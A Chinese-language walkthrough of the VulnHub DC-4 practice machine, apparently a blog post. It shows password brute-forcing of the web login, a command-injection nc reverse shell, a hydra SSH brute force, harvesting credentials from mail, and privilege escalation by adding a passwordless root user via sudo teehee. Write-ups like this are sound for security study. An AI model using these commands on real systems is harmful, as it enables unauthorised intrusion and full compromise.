vulnhub dc4 靶场实战
靶场地址:https://download.vulnhub.com/dc/DC-4.zip
判断靶场的ip
确认IP为:192.168.123.233
扫一扫后台地址
扫一下是什么web
扫描端口、服务等
80端口,访问走一走
发现了admin信息登录系统
那既然是admin,那不得走一波密码爆破
按照长度排个序,660这个,就是它了
有时候也可以根据status来判断,但是也有例外
如果登录成功后,它的长度和状态码都还是一样的情况下,可能是登录成功后就跳转了,所以这种情况下怎么在这么多的请求中发现爆破成功的那种,大伙有啥其他思路分享一下!嘿嘿嘿
账号:admin 密码:happy (这里不区分大小写,我试过了,一般登录验证页面也不会做大小写区分)
发现可以执行命令啊,burpsuite抓个包
抓个包,发送到repeater,再写个nc反弹shell(如果不成功,记得对空格进行编码)
1 | nc –e /bin/sh 192.168.123.233 4444 |
发包之前记得用nc侦听4444端口
1 | nc -vlp 4444 |
成功拿到网站权限
然后在jim用户下发现了backups文件夹
然后在backups下发现了一个old-password.bak旧密码备份文件
cat查看一波
把这些密码保存起来,用hydra爆破一下jim用户ssh密码
1 | hydra -l jim -P pass.txt ssh://192.168.123.233 -vV -t 64 |
我这个线程开得比较大64个,真实情况下一般开小点
这个pass.txt里保存的就是刚刚那个旧密码备份文件中的密码
爆破成功,密码为jibril04
登录jim用户看看有什么
发现了一封邮件,不过没什么可用信息,但是既然有邮件,就要去系统的邮件服务文件夹去看看
在var/mail中又看到了charles用户给jim用户发的邮件,里面还有charles用户的密码
看看能不能拿到root目录下的flag,很明显事情没那么简单
接下来开始提权
发现用 teehee可以运行root权限的命令,那就创建一个root权限的用户,不设置密码
1 | echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd #添加admin用户 |
切换用户,查看flag
总结:
- 用户文件夹里有邮件,就可能出现过收发邮件操作,所以去系统存放邮件的文件夹里查看一番是很有必要的,蛛丝马迹
- 利用teehee命令添加一个拥有root权限的用户,且使用root权限添加用户还不用输入密码(利用root无密码执行)